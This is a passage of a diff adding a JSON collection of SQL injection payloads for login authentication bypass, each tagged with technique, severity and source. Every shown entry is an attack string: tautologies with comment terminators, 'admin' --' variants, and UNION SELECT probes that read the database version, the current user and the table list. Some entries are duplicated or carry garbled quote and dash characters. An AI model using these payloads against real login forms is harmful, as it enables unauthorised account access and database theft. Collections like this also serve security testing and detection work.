"authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" --", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" #", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\"/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' and 1='1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' and a='a", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "or 1=1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or ''='", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or \"\"=\"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "1′) and '1′='1–", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" AND 1=0 UNION ALL SELECT \"\", \"81dc9bdb52d04dc20036dbd8313ed055", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "and 1=1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "and 1=1–", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' and 'one'='one", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' and 'one'='one–", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' group by password having 1=1--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' group by userid having 1=1--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' group by username having 1=1--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "like '%'", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "or 0=0 --", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "or 0=0 #", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "or 0=0 –", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 0=0 #", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 0=0 --", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 0=0 #", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 0=0 –", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or 0=0 --", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or 0=0 #", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or 0=0 –", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "%' or '0'='0", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "or 1=1--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "or 1=1/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "or 1=1#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "or 1=1–", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 1=1--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or '1'='1'--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or '1'='1'/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or '1'='1'#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or '1′='1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 1=1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 1=1 –", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 1=1;#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 1=1/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 1=1#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 1=1–", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or '1'='1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or '1'='1--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or '1'='1'--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or '1'='1'/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or '1'='1'#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or ('1'='1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or ('1'='1--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or ('1'='1'--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or ('1'='1'/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or ('1'='1'#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "'or'1=1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "'or'1=1′", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or \"1\"=\"1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or \"1\"=\"1\"--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or \"1\"=\"1\"/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or \"1\"=\"1\"#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or 1=1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or 1=1 --", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or 1=1 –", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or 1=1--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or 1=1/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or 1=1#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or 1=1–", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\") or \"1\"=\"1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\") or \"1\"=\"1\"--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\") or \"1\"=\"1\"/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\") or \"1\"=\"1\"#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\") or (\"1\"=\"1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\") or (\"1\"=\"1\"--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\") or (\"1\"=\"1\"/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\") or (\"1\"=\"1\"#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": ") or '1′='1–", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": ") or ('1′='1–", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 1=1 LIMIT 1;#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "'or 1=1 or ''='", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\"or 1=1 or \"\"=\"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 'a'='a", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or a=a--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or a=a–", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or ('a'='a", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or \"a\"=\"a", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\") or (\"a\"=\"a", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or ('a'='a and hi\") or (\"a\"=\"a", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 'one'='one", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 'one'='one–", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or uid like '%", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or uname like '%", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or userid like '%", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or user like '%", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or username like '%", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 'x'='x", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "') or ('x'='x", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "\" or \"x\"=\"x", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' OR 'x'='x'#;", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "'=' 'or' and '=' 'or'", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' UNION ALL SELECT 1, @@version;#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' UNION ALL SELECT system_user(),user();#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "union_select", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' UNION select table_schema,table_name FROM information_Schema.tables;#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "union_select", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "admin' and substring(password/text(),1,1)='7", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' and substring(password/text(),1,1)='7", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "' or 1=1 limit 1 -- -+", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass2" + } + }, + { + "payload": "'=\"or'", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass2" + } + }, + { + "payload": "'-'", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "' '", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "'&'", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "'^'", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "'*'", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "' or ''-'", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "' or '' '", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "' or ''&'", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "' or ''^'", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "' or ''*'", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "\"-\"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "\" \"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "\"&\"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "\"^\"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "\"*\"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "\" or \"\"-\"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "\" or \"\" \"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "\" or \"\"&\"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "\" or \"\"^\"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "\" or \"\"*\"", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "or true--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "\" or true--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "' or true--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "\") or true--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "') or true--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "') or ('x')=('x", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "')) or (('x'))=(('x", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "\") or (\"x\")=(\"x", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "\")) or ((\"x\"))=((\"x", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin' --", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin' #", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin'/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin' or '1'='1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin' or '1'='1'--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin' or '1'='1'#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin' or '1'='1'/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin'or 1=1 or ''='", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin' or 1=1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin' or 1=1--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin' or 1=1#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin' or 1=1/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "boolean_logic", + "dbms": "generic", + "severity": "high", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin') or ('1'='1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin') or ('1'='1'--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin') or ('1'='1'#", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin') or ('1'='1'/*", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin') or '1'='1", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin') or '1'='1'--", + "category": "sqli", + "metadata": { + "type": "authentication_bypass", + "technique": "basic", + "dbms": "generic", + "severity": "medium", + "source": "Auth_Bypass" + } + }, + { + "payload": "admin') or '1'='1'#", + "category": 